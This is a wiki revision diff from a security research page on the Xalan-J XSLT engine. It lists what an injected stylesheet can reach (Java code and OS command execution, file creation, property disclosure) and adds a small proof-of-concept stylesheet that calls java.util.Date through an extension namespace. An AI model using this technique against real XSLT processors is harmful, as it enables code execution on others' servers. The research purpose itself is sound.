Changes for page Engine_XalanJ

Last modified by Nicolas Gregoire on 2012/01/31 17:35
From version Icon 40.1 Icon
edited by Nicolas Gregoire
on 2012/01/11 23:29
Change comment: There is no comment for this version
To version Icon 45.1 Icon
edited by Nicolas Gregoire
on 2012/01/11 23:38
Change comment: Upload new attachment xalanj-java-date.xsl

Summary

Details

Icon Page properties
Content
... ... @@ -22,7 +22,7 @@
22 22  * Java properties disclosure
23 23  * Java environment disclosure
24 24  * Java code execution
25 -* Arbitrary command execution
25 +* OS command execution
26 26  * File creation
27 27  * JDBC connectivity
28 28  
... ... @@ -44,12 +44,11 @@
44 44  
45 45  The attached code will display the current date using a newly created "java.util.Date" object. This should be enough to demonstrate Java code execution.
46 46  
47 -
48 48  |=Namespace|=Extension function|=PoC|=Sample output
49 49  |http:~/~/xml.apache.org/xalan/java/java.util.Date|new()|[[xalanj-java-date.xsl>>attach:xalanj-java-date.xsl]]|Current date:
50 50  Wed Jan 11 22:45:07 CET 2012
51 51  
52 -== Execution of external commands ==
51 +== OS command execution ==
53 53  
54 54  The following code will execute the command "touch /tmp/hello" :
55 55  
Icon xalanj-java-date.xsl
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +409 bytes
Content
... ... @@ -1,0 +1,11 @@
1 +<xsl:stylesheet version="1.0"
2 + xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
3 + xmlns:date="http://xml.apache.org/xalan/java/java.util.Date"
4 + exclude-result-prefixes="date">
5 + <xsl:output method="text"/>
6 + <xsl:template match="/">
7 + <xsl:variable name="dateObject" select="date:new()"/>
8 + <xsl:text>Current date: </xsl:text><xsl:value-of select="$dateObject"/>
9 + </xsl:template>
10 +</xsl:stylesheet>
11 +